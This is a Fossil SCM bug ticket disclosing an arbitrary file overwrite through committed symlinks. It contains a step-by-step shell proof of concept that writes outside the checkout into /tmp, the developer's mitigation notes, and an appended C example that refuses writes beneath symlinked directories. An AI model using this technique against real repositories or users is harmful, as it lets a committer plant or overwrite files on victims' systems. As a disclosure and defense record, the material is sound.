Fossil SCM

Arbitrary file overwrite using symlinks

Fixed

f9831fdef1d4edc… · opened 5 years, 7 months ago

Type: Code_Defect
Priority: Immediate
Severity: Critical
Resolution: Fixed
Subsystem:
Created: Aug. 17, 2020 8:39 a.m.

A malicious user with check-in privileges can overwrite arbitrary files on a victim's system by exploiting weaknesses in the symlink mechanism of Fossil. Max Justicz provides the following demo:

fossil init oops.fossil
mkdir checkout
cd checkout
fossil open ../oops.fossil

ln -s /tmp/ link
fossil add link
fossil commit -m "add link"

echo "oops" > link/foo.txt
fossil add link/foo.txt
fossil commit -m "add foo"

# Remove the file so we can show the exploit works
rm /tmp/foo.txt

cd ..
fossil serve oops.fossil

# In another terminal
fossil clone http://localhost:8080/oops.fossil oops2.fossil
mkdir checkout2
cd checkout2
fossil open ../oops2.fossil

# /tmp/foo.txt was created!
cat /tmp/foo.txt

Comments (3)

drh 5 years, 7 months ago

Mitigations from check-in ff98dd5af61aef30ca4:

  • The allow-symlinks setting is off by default. Users must explicitly enable symlink support in order for Fossil to create symlinks.

  • The allow-symlinks setting is no longer a versioned setting. It must be set manually by the developer who wants to use it.

  • The allow-symlinks setting no longer propagates via clone. The setting continues to be off by default for clones even if it is on in the server.

drh 5 years, 7 months ago

Additional defenses:

  • When checking out files, do not write files that are beneath a symlink in the check-out.

  • When doing a "fossil add", ignore files that are beneath a symlink.
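As an added example (not Fossil's own code), this is the shape of the first of the additional defenses above: before a checkout writes a file, every directory component of its path is inspected with lstat(), and the write is refused if any of them is a symlink. The fixture is constructed to mirror the demo's "link -> /tmp"; the check assumes the relative path has already been validated against ".." components, which is a separate concern.

```c
/* Added example, not Fossil's own code: the ticket's "additional defense" of
 * refusing to write a checkout file when a directory on its path is a symlink. */
#define _DEFAULT_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>
/* 1 = a directory component of root/rel is a symlink, 0 = safe, -1 = too long. */
int path_has_symlink_dir(const char *root, const char *rel) {
  char buf[4096];
  struct stat st;
  size_t n = strlen(root);
  if (n + strlen(rel) + 2 > sizeof buf) return -1;
  memcpy(buf, root, n);
  for (const char *p = rel;;) {
    const char *slash = strchr(p, '/');
    if (!slash) return 0;            /* last component is the file itself */
    if (slash > p) {                 /* skip empty components ("a//b") */
      buf[n++] = '/';
      memcpy(buf + n, p, (size_t)(slash - p));
      n += (size_t)(slash - p);
      buf[n] = '\0';
      /* lstat() does not follow links; a missing dir is fine, checkout creates it */
      if (lstat(buf, &st) == 0 && S_ISLNK(st.st_mode)) return 1;
    }
    p = slash + 1;
  }
}
/* Write content to root/rel: 0 = written, 1 = refused (symlink on path), -1 = error. */
int safe_checkout_write(const char *root, const char *rel, const char *content) {
  char path[4096];
  int r = path_has_symlink_dir(root, rel);
  if (r != 0) return r < 0 ? -1 : 1;
  snprintf(path, sizeof path, "%s/%s", root, rel);
  FILE *f = fopen(path, "w");
  if (!f) return -1;
  fputs(content, f);
  return fclose(f) == 0 ? 0 : -1;
}
/* Constructed fixture: temp checkout with a real dir and "link" -> /tmp, as in the demo. */
const char *demo_checkout(void) {
  static char root[64] = "", p[128];
  if (root[0]) return root;
  strcpy(root, "/tmp/fossil-symlink-demo.XXXXXX");
  if (!mkdtemp(root)) { root[0] = '\0'; return NULL; }
  snprintf(p, sizeof p, "%s/real", root); (void)mkdir(p, 0700);
  snprintf(p, sizeof p, "%s/link", root); (void)symlink("/tmp", p);
  return root;
}
```

With the fixture in place, writing "real/foo.txt" succeeds while "link/foo.txt" is refused instead of landing in /tmp.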
